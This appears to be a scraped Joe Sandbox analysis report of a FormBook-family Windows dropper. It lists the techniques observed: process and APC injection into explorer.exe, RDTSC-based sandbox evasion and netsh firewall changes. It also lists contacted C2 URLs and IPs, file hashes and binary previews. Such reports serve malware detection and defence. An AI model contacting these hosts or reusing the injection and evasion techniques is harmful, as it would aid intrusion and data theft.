          Security Software Discovery          		Remote Desktop Protocol11
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)412
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object Model2
          Clipboard Data          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 755996 Sample: 2022-571-GLS.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 11 2022-571-GLS.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\...\jsqqecy.exe, PE32 11->31 dropped 14 jsqqecy.exe 11->14         started        process5 signatures6 63 Multi AV Scanner detection for dropped file 14->63 65 Machine Learning detection for dropped file 14->65 67 Maps a DLL or memory area into another process 14->67 69 Tries to detect virtualization through RDTSC time measurements 14->69 17 jsqqecy.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Queues an APC in another process (thread injection) 17->43 20 explorer.exe 17->20 injected process9 dnsIp10 33 www.fulili.com 45.221.114.43, 49698, 80 sun-asnSC South Africa 20->33 35 td-ccm-168-233.wixdns.net 34.117.168.233, 49696, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 20->35 37 4 other IPs or domains 20->37 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Uses netsh to modify the Windows network and firewall settings 20->55 24 netsh.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2022-571-GLS.exe30%ReversingLabsWin32.Packed.Generic
          2022-571-GLS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe20%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.jsqqecy.exe.1090000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.2022-571-GLS.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.jsqqecy.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.2022-571-GLS.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.2.jsqqecy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          td-ccm-168-233.wixdns.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi0%Avira URL Cloudsafe
          http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi100%Avira URL Cloudmalware
          http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi0%Avira URL Cloudsafe
          www.cdlcapitolsolutions.com/b31b/100%Avira URL Cloudmalware
          www.cdlcapitolsolutions.com/b31b/1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          td-ccm-168-233.wixdns.net
          		34.117.168.233
          		truetrueunknown
          www.fulili.com
          		45.221.114.43
          		truetrue
            		unknown
            825610.parkingcrew.net
            		75.2.81.221
            		truefalse
              		high
              www.cdlcapitolsolutions.com
              		unknown
              		unknowntrue
                		unknown
                www.easyentry.vip
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDitrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDitrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDitrue
                  • Avira URL Cloud: safe
                  		unknown
                  www.cdlcapitolsolutions.com/b31b/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://nsis.sf.net/NSIS_Error2022-571-GLS.exefalse
                      		high
                      http://nsis.sf.net/NSIS_ErrorError2022-571-GLS.exefalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        45.221.114.43
                        		www.fulili.comSouth Africa
                        		328543sun-asnSCtrue
                        34.117.168.233
                        		td-ccm-168-233.wixdns.netUnited States
                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                        75.2.81.221
                        		825610.parkingcrew.netUnited States
                        		16509AMAZON-02USfalse

                        General Information

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:755996
                        Start date and time:2022-11-29 13:15:07 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:2022-571-GLS.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/4@3/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 68.9% (good quality ratio 59.8%)
                        • Quality average: 70.7%
                        • Quality standard deviation: 35.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 52
                        • Number of non-executed functions: 113
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        45.221.114.43Swift.exeGet hashmaliciousBrowse
                        • www.fulili.com/b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w
                        202217110313.exeGet hashmaliciousBrowse
                        • www.fulili.com/b31b/?JBZ0W=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqe20FbIXBW8LwKdMbQ==&cRGL=SjX8cfY8C
                        34.117.168.233http://www.fpat.infoGet hashmaliciousBrowse
                        • www.fpat.info/
                        BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                        • www.tsomatsi.com/ad6t/
                        DHL Shipment_pdf.exeGet hashmaliciousBrowse
                        • www.growthmindseteduc.com/olus/?1bBtZFWH=57BljkTueo3i58Fl0LwcPfIx7MB9kS4NucBVNh7Z4p7WPgeSNLRLANXLctdxd7aaEcBV6Ynl4kQTtcD6bzYixM6P8Tl/aNVDuQ==&l48Tj=kJElILu890phGx_0
                        SecuriteInfo.com.MSIL.Agent.NLO.tr.dldr.21192.28546.exeGet hashmaliciousBrowse
                        • www.cerradoforte.com/fs44/?j6Axm=0zuHZPMXzXqdO2kP&znoHRDz=kV4xYIicRAziMuyMO/yn4PXNWf8Dpwekrfo/O4LmG3nkxa1YrKEd8dauY5Z8p5MwI0oF
                        iI2up4rQE6iJTDn.exeGet hashmaliciousBrowse
                        • www.toptierfinancials.net/axe3/?GpCTV=x9h6r+ZPweEsf1PUnVGxOEpx8qSKPTpGeg//dYKMwsVN4P+3kM40+uvojxekWST/I3spkwmmyglrBN2YMJiOvJSc3fN/lyhKsA==&3fiXBH=AL3tZJm8V
                        IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                        • www.bebeciks.com/cprp/
                        Notice-228383848-9032.vbsGet hashmaliciousBrowse
                        • www.codyhinrichs.com/b3es/
                        DHL Notification.exeGet hashmaliciousBrowse
                        • www.growthmindseteduc.com/olus/?CPn08=57BljkTueo3i58Fl0LwcPfIx7MB9kS4NucBVNh7Z4p7WPgeSNLRLANXLctdxd7aaEcBV6Ynl4kQTtcD6bzYixM6P8Tl/aNVDuQ==&3fl=T0DTK4dpcT30K4rp
                        customer_2022-11-17_124747.vbsGet hashmaliciousBrowse
                        • www.tsomatsi.com/ad6t/
                        SecuriteInfo.com.Win64.PWSX-gen.5146.30822.exeGet hashmaliciousBrowse
                        • www.kandslogisticsllc.com/codp/?p8Ot=ML308h7884l8vl5&ZT5Dw29=0mwejOc2wfv/+aD6dkuClzKdrdesqSX22EFfPSWIGq7D+XrKVUC6PHtuMSCrKsm2t7CD5kSgXjqa46QHsNlrRTH7cYrmG0/wFg==
                        042KIT67.exeGet hashmaliciousBrowse
                        • www.inner-wisdomhealing.com/my84/?F2J0zNE=dES1iYQjaj2JKCHi3Fva0a+Rmqt3DR+oMnYBE6CUC/gLbWn3UgnS1roCeGZqwkor+6TY&0ZoHQL=C0DD
                        H4oimu4PlB.exeGet hashmaliciousBrowse
                        • www.thesageartist.com/aoj8/?y8Q=zuMEKwDs/hfjIrHflPQdmgP1ttjW0s0VwjE8bJg1IXpYDUnbAwNPAGd5LqHkXysvD8XNe0CDOndWW6d1hcxYn1czwYMIMvDgYUwCvChg3nPp&i2=Phup26RPJ8Nd8Zg
                        vks5KimT6y.exeGet hashmaliciousBrowse
                        • www.atyourservicelimoaz.com/dqup/?pVG=GNezWkH0bRjLZsprRtpk6B41rRp0T9XlrmP8IspepJ6uTr4ute/RQizraHEVrNLZbJMqQ0cEvCZi42IRBiG7+BT2ZEqP1LVemQ==&7ncPa=i6ydKZa06JB8h
                        rvTGMQKeNc.exeGet hashmaliciousBrowse
                        • www.thesageartist.com/aoj8/?3f=zuMEKwDs/hfjIrHflPQdmgP1ttjW0s0VwjE8bJg1IXpYDUnbAwNPAGd5LqHkXysvD8XNe0CDOndWW6d1hcxZg1Zi/7kAC9nraw==&s6t8=QDHdADYpddihSV
                        Ey8Y07rDyr.exeGet hashmaliciousBrowse
                        • www.growthmindseteduc.com/olus/?m48h=57BljkTueo3i58Fl0LwcPfIx7MB9kS4NucBVNh7Z4p7WPgeSNLRLANXLctdxd7aaEcBV6Ynl4kQTtcD6bzYhrZWTi3h2Z8IXrqFcde+RNc23&DxoHs6=7nqTVF4p
                        DHL-INV-MVU.exeGet hashmaliciousBrowse
                        • www.doopiedog.com/jftb/?2duXw4=dAt3+fK+63zeOgWx9ILNgDpmQP8P1ccvLPnc/eEQTrJGujcbIXwG+uLKcGgr8dfXYVKUkHmYGS40QVn7Oii5obGNdwwbYi1yyA==&5j6x=jXdX
                        DHL Shipment.exeGet hashmaliciousBrowse
                        • www.growthmindseteduc.com/olus/?3fiHu=57BljkTueo3i58Fl0LwcPfIx7MB9kS4NucBVNh7Z4p7WPgeSNLRLANXLctdxd7aaEcBV6Ynl4kQTtcD6bzYixKmeik5/ZNdxuQ==&1bWh=B6AhpluhXbF4z
                        file.exeGet hashmaliciousBrowse
                        • www.mahallece.com/fswe/?J2M=QIKSScevUWrH4GvD1OC1Lto06ByF2AUjqcP/lwuaJ0mCErNBFmWaOYojqzfvG/MN70hvUn8sVubEOt0np87/Xtt/srJEFY8Xrw==&BJE=6lxXI
                        TYJqctS6F1.exeGet hashmaliciousBrowse
                        • www.toptierfinancials.net/axe3/?tT1=_2MtS&-ZY0Fh=x9h6r+ZPweEsf1PUnVGxOEpx8qSKPTpGeg//dYKMwsVN4P+3kM40+uvojxekWST/I3spkwmmyglrBN2YMJiOsJS3mPd+jDhKpqmVoj1NPbZY
                        Winehouse.exeGet hashmaliciousBrowse
                        • www.basikbiz.com/ma6v/?jf-D=3U5qwf35Fn56g4F4HUSJ1b0t0DsIKiaEgTtOix6lvlDREHdmKdghKf+vpyDCkVmDmL11OwPxdadRCY6+hMsUJ6sZnUBpQyfIdQ==&ExoDYV=g2Mpvxc8NXId9ts

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        td-ccm-168-233.wixdns.nethttp://www.fpat.infoGet hashmaliciousBrowse
                        • 34.117.168.233
                        BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                        • 34.117.168.233
                        DHL Shipment_pdf.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        SecuriteInfo.com.MSIL.Agent.NLO.tr.dldr.21192.28546.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        iI2up4rQE6iJTDn.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        https://cdncleaningservices.comGet hashmaliciousBrowse
                        • 34.117.168.233
                        IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                        • 34.117.168.233
                        Notice-228383848-9032.vbsGet hashmaliciousBrowse
                        • 34.117.168.233
                        DHL Notification.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        https://colestudioweir.comGet hashmaliciousBrowse
                        • 34.117.168.233
                        file.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        https://www.architektur-rkw.de/Get hashmaliciousBrowse
                        • 34.117.168.233
                        customer_2022-11-17_124747.vbsGet hashmaliciousBrowse
                        • 34.117.168.233
                        SecuriteInfo.com.Win64.PWSX-gen.5146.30822.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        042KIT67.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        H4oimu4PlB.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        vks5KimT6y.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        rvTGMQKeNc.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        Ey8Y07rDyr.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        Wikipedia_avn.jsGet hashmaliciousBrowse
                        • 34.117.168.233
                        www.fulili.comSwift.exeGet hashmaliciousBrowse
                        • 45.221.114.43
                        202217110313.exeGet hashmaliciousBrowse
                        • 45.221.114.43
                        825610.parkingcrew.netDHL Shipment Delivery Notification 21-12-21.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        Letter of Intent.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        digitization_pdf.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        2GJROg1MYp.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        QVwfduoULs.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        EVYSTAL Players Profile and Proposal 26721.xlsxGet hashmaliciousBrowse
                        • 75.2.81.221
                        pMbPS8nCm1.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        PQMW0W5h3X.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        Shipping Documents C1216.exeGet hashmaliciousBrowse
                        • 75.2.81.221
                        47DOC008699383837383 PDF.exeGet hashmaliciousBrowse
                        • 54.72.9.115
                        29SCAN 0750.exeGet hashmaliciousBrowse
                        • 54.72.9.115

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        sun-asnSCSwift.exeGet hashmaliciousBrowse
                        • 45.221.114.43
                        202217110313.exeGet hashmaliciousBrowse
                        • 45.221.114.43
                        bk.mpsl-20220930-0404.elfGet hashmaliciousBrowse
                        • 102.134.57.97
                        v22-003920.exeGet hashmaliciousBrowse
                        • 45.221.109.201
                        EtAT4sBTxbGet hashmaliciousBrowse
                        • 45.221.118.202
                        arm-20220318-0536Get hashmaliciousBrowse
                        • 45.221.118.204
                        Payment Copy.exeGet hashmaliciousBrowse
                        • 102.134.51.19
                        Hilix.armGet hashmaliciousBrowse
                        • 45.221.118.207
                        Yeni sat#U0131n alma sipari#U015fi.exeGet hashmaliciousBrowse
                        • 63.215.181.150
                        u9Bt1oWLEW.exeGet hashmaliciousBrowse
                        • 63.215.181.213
                        ORDER -ASLF1SR00116-PDF.docGet hashmaliciousBrowse
                        • 63.215.181.105
                        LEMOH.exeGet hashmaliciousBrowse
                        • 45.221.113.101
                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                        • 45.221.113.101
                        HEN.exeGet hashmaliciousBrowse
                        • 45.221.113.101
                        DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                        • 45.221.98.240
                        813541fc_by_Libranalysis.exeGet hashmaliciousBrowse
                        • 45.221.98.205
                        PURCHASE ORDER.exeGet hashmaliciousBrowse
                        • 102.134.56.242
                        PO.exeGet hashmaliciousBrowse
                        • 102.134.56.237
                        Updated SOA.xlsxGet hashmaliciousBrowse
                        • 102.134.56.243
                        W88AZXFGH.exeGet hashmaliciousBrowse
                        • 102.134.56.242
                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGscan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                        • 34.117.59.81
                        https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9Get hashmaliciousBrowse
                        • 34.66.3.160
                        http://www.fpat.infoGet hashmaliciousBrowse
                        • 34.117.168.233
                        BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                        • 34.117.168.233
                        DHL Shipment_pdf.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        SecuriteInfo.com.Win32.PWSX-gen.1328.4933.exeGet hashmaliciousBrowse
                        • 34.117.234.7
                        cLBfz7BdvL.exeGet hashmaliciousBrowse
                        • 34.117.59.81
                        63F13767CD38209385164D5517A55A6846996268F7C3C.exeGet hashmaliciousBrowse
                        • 34.117.59.81
                        SecuriteInfo.com.Win32.PWSX-gen.18362.32438.exeGet hashmaliciousBrowse
                        • 34.117.234.7
                        Fact63814.msiGet hashmaliciousBrowse
                        • 34.117.59.81
                        Sixt_receipt_81642755.docGet hashmaliciousBrowse
                        • 34.66.87.174
                        SecuriteInfo.com.Win32.PWSX-gen.10063.29954.exeGet hashmaliciousBrowse
                        • 34.117.234.7
                        file.exeGet hashmaliciousBrowse
                        • 34.117.59.81
                        file.exeGet hashmaliciousBrowse
                        • 34.117.59.81
                        SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exeGet hashmaliciousBrowse
                        • 34.117.59.81
                        SecuriteInfo.com.Trojan.PackedNET.1685.14272.26861.exeGet hashmaliciousBrowse
                        • 34.117.234.7
                        https://protect-us.mimecast.com/s/lF5dCKrGLrfJw4QKuM13x7?domain=urldefense.comGet hashmaliciousBrowse
                        • 34.117.177.207
                        iI2up4rQE6iJTDn.exeGet hashmaliciousBrowse
                        • 34.117.168.233
                        https://cdncleaningservices.comGet hashmaliciousBrowse
                        • 34.117.168.233
                        IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                        • 34.117.168.233

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\jsqqecy.exe

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):147968
                        Entropy (8bit):6.1823629557808895
                        Encrypted:false
                        SSDEEP:3072:5qOPPLBLPd3kaQ+nBwYb+SxRC//LhYcglg7JdWGAwDY4Y4OCJiy:5qiLBLPdm/DhwgF4GduSv
                        MD5:07875284CE0A6276F406B25F9E429270
                        SHA1:38A67882404FE8CD7473C8B1949A0B5384B36F94
                        SHA-256:AED6B2A3FB3845ECBC1AB0DFE26AED0CFFD1D220CA86F77BEBB44ECA02B3229E
                        SHA-512:5DB9EF373A1535012BFEA4E4052616C4AF565B57535B2F5F381261AD2D13213592BB4AA80FFDE21139E00D8EB1B5A2612F205F72CA816613510F0D292C0A44C1
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:low
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.c..........................................@.......................................@.........................................................................................................`...................|............................text...0........................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\nst2736.tmp

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):351352
                        Entropy (8bit):7.441400818204764
                        Encrypted:false
                        SSDEEP:6144:FzKMbPJYY6ICfgM26evm226r8wqiLBLPdm/DhwgF4GduSv:08a+6xcqiLBLPcNnjdr
                        MD5:F1E31AC6BD355DFA2F813075E84BCD0D
                        SHA1:2C7C4B34C64E295DC9A1A7C803EB4E715AA00559
                        SHA-256:39D893328B257A69AAB166D4843B16970AA8DF9B615A7356B8D3DB8351CFF089
                        SHA-512:41B4422AB47A9FE2415678EA499D58F6AFF971044C581B95D8F6EC723248AD91CC622F6172D9B639DFEF4FAAFFD56F6180B63B03E3C1739C48FB54D34F510EFF
                        Malicious:false
                        Reputation:low
                        Preview:........,...................[...............................................................................................................................................................................................................................................................J...............!...j...........................................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\xduyswx.up

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5765
                        Entropy (8bit):6.2092599243644075
                        Encrypted:false
                        SSDEEP:96:xqZQ5qvebu9XscBHOPNr9p1H9sBL3I9I4kcAlsRW1aR1vOj4GV8rqxyRG2OJkac/:xiQqGq9Xs+O1smVr+8WxyfikaF0MOJOY
                        MD5:813EA3E20968DCA381FD705CCE6352AF
                        SHA1:F5641EE0577E29603C5146827B0F3E920B307011
                        SHA-256:BA88F948DE0F61DD0E1E09D5ABB977794A350380612C4F8E5AB7A7D5D3C5E108
                        SHA-512:681484352435EF93B1E3EC909F30627C4373CB5F862A60C523DA9A02AE5DA9292004BD5C1787686E9025C81A19C47AB25F7B6F7072A86E3211728B02A95A63F3
                        Malicious:false
                        Reputation:low
                        Preview:.f.. .\...+l.+l.+.+.+l...+. .\...zw+l.+$.+..-...\.V...=.0.+Z[.-.s..+jT.......+.z+-..Jc..w..+....j........b+.=.-........+.y .\...+l.+l.+.+.+l..'...|.t...=.0.E..y........c}...s....+.+}.z+.=.0U+..=.0.w+5.=.0.K...v4.jC..-........+.yy.zw+5.s.+gX+.d$..+|L+....+t`..+l...1..1..1}.=.0.+....|.N...[}.0V+..j[-.6.s...{....+}.....+.C...+.yy.zw .\...+l.+l.+.+.+l..0...|.-...+5.+.w1.....-.+...[.-.C...w..=.0{+}.K.1}...Pd..+...+.Et.C.L..+.~.[.Er....g.EjL.....[.+..g..[.-.+5.+..C..15.w1.....[.+}.6.s..s.l..{.....+.z+-..Jc..w..+....E.........b+.=.-........+.).....}....E}.1}..}.[.}.e.}...}.6.}.3C...C.......1}.....1}.....1}.....1}.....1}.....1}..R..1}.....1}.....1}.s..1}.&...1}.......-..Y...1}<.cZ...-..I...1}...6...-......1}.......-......1}8.l....-......1}D.zN...-......1}...U...-......1}..$.9..-....1}.s.l.....s.l....s.l....es.l.....js.l....iE}.1}.C.....+}.l1}.C5..3`+}.s.....+}....+....h.s.+}.4h....s.l.....s.i...h.[.-.s.l.....s.i...h.[.-hs.l......s.i....h.[.-ps.l

                        C:\Users\user\AppData\Local\Temp\zpnolg.oo

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):189440
                        Entropy (8bit):7.990584575642086
                        Encrypted:true
                        SSDEEP:3072:lMbPJNjiLu5FhvUoerrdDaVCz37gMbapLPlA/evm2260F+8vV:lMbPJYY6ICfgM26evm226r89
                        MD5:1CBA56AA7342010C42DE3448072BFFD6
                        SHA1:41750AFCF5D21B6C3D1EF4D8B17CD5C283353206
                        SHA-256:1F2933BB236406B4E5E0C84B64441F7103E8860C3DB1014E1D07BEABD47AC584
                        SHA-512:E0DFB340E005729E784C828BEBFD428C147DB6EBC06A4261C960CE5CC2F5379A65DD723E7959A75A6D4F297AB5F7FC22ABE255D17E29E6D971E2E78845ADEE61
                        Malicious:false
                        Reputation:low
                        Preview:......b......+...Z]..[.S=.+4..O|......N..pF..X..+.L%..d..",.*.x....8-v@.).B!..g....:.@\f....r.jk...B..K.].C.../.xh....'e.i...._..?A..L......%....-.l....5..[.P;.(.j.|..s..?c..;..Kr{2/...,.UPU.`.c..A\i....t\?=..Ox.(..1 ..,z-tf\V.@.._..AZ9..BB.....^..x.b;...ML.w...]B....:..g-..|.n....N...F..X..+.L ..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;...WX./..<C....q......]\i..r.K*%.U.......1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.93130981619841
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2022-571-GLS.exe
                        File size:274453
                        MD5:6cc14805bbf5e6bfb4daae5c8a61af7e
                        SHA1:34836f2aa6a4e97705352a50d2a7147c857fea94
